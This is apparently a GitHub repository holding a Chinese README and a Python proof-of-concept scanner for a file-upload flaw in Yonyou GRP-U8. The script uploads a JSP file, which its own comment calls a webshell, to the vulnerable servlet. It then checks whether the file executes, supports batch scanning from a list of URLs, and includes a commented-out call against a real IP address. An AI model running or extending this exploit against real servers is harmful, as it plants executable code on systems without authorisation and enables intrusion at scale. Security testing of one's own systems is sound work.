├── README.md
└── 用友文件上传.py


/README.md:
--------------------------------------------------------------------------------
 1 | # -
 2 | 用友文件上传
 3 | ```
 4 | 使用方法：python 用友文件上传.py
 5 | 单个扫描：python 用友文件上传.py --url http://www.xxx.com
 6 | 批量扫描：python 用友文件上传.py --file xxx.txt
 7 | 更多详细帮助：python 用友文件上传.py --help
 8 | ![image](https://github.com/user-attachments/assets/9ac747a7-3610-4f54-989a-093d8139f3a6)
 9 | 
10 | 
11 | 
12 | 
13 | 
14 | ```
15 | 


--------------------------------------------------------------------------------
/用友文件上传.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import requests
 3 | import argparse
 4 | 
 5 | # 漏洞检测模块
 6 | def checkVuln(url):
 7 |     vulnurl = url + "/servlet/FileUpload?fileName=1.jsp&actionID=update"  #漏洞页面信息
 8 |     okurl = url + "/R9iPortal/upload/1.jsp" # 上传文件的地址
 9 |     data = """<% out.println("24k");%>"""  # Webshell
10 | 
11 |     headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0',
12 |                'Content-Type': 'multipart/form-data; boundary=---------------------------32840991842344344364451981273'
13 |                }
14 |     try:
15 |         response = requests.post(vulnurl, headers=headers, data=data, timeout=5, verify=False)
16 |         if response.status_code == 200:
17 |             if '24k' in requests.get(okurl, headers=headers, timeout=5, verify=False).text:
18 |                 print(f"【+】当前网址存在漏洞：{url}")
19 |                 with open("vuln.txt", "a+") as f:
20 |                     f.write(okurl + "\n")
21 |             else:
22 |                 print("【-】目标网站不存在漏洞...")
23 | 
24 |         else:
25 |             print("【-】目标网站不存在漏洞...")
26 |     except Exception as e:
27 |         print("【-】目标网址存在网络链接问题...")
28 | 
29 | # checkVuln("http://61.136.185.190:8888")
30 | # 批量漏洞检测模块
31 | def batchCheck(filename):
32 |     with open(filename, "r") as f:
33 |         for readline in f.readlines():
34 |             checkVuln(readline)
35 | 
36 | def banner():
37 |     bannerinfo = """██╗   ██╗██╗   ██╗ ██████╗ ██████╗ ██████╗       ██╗   ██╗ █████╗ 
38 | ╚██╗ ██╔╝╚██╗ ██╔╝██╔════╝██╔════╝ ██╔══██╗      ██║   ██║██╔══██╗
39 |  ╚████╔╝  ╚████╔╝ ██║     ██║  ███╗██████╔╝█████╗██║   ██║╚█████╔╝
40 |   ╚██╔╝    ╚██╔╝  ██║     ██║   ██║██╔══██╗╚════╝██║   ██║██╔══██╗
41 |    ██║      ██║   ╚██████╗╚██████╔╝██║  ██║      ╚██████╔╝╚█████╔╝
42 |    ╚═╝      ╚═╝    ╚═════╝ ╚═════╝ ╚═╝  ╚═╝       ╚═════╝  ╚════╝"""
43 |     print(bannerinfo)
44 |     print("YYGRP-U8".center(100, '*'))
45 |     print(f"[+]{sys.argv[0]} --url htttp://www.xxx.com 即可进行单个漏洞检测")
46 |     print(f"[+]{sys.argv[0]} --file targetUrl.txt 即可对选中文档中的网址进行批量检测")
47 |     print(f"[+]{sys.argv[0]} --help 查看更多详细帮助信息")
48 |     print("--author:Thejoyofgettingusedtolife  联系方式：liuhangtong527@gmail.com".rjust(100," "))
49 | 
50 | # 主程序方法，进行调用
51 | def main():
52 |     parser = argparse.ArgumentParser(description='GRP-U8-UploadFile漏洞单批检测脚本@xhonger')
53 |     parser.add_argument('-u','--url', type=str, help='单个漏洞网址')
54 |     parser.add_argument('-f','--file', type=str, help='批量检测文本')
55 |     args = parser.parse_args()
56 |     if args.url:
57 |         checkVuln(args.url)
58 |     elif args.file:
59 |         batchCheck(args.file)
60 |     else:
61 |         banner()   # 欢迎信息....
62 | 
63 | if __name__ == '__main__':
64 |     main()
65 | 


--------------------------------------------------------------------------------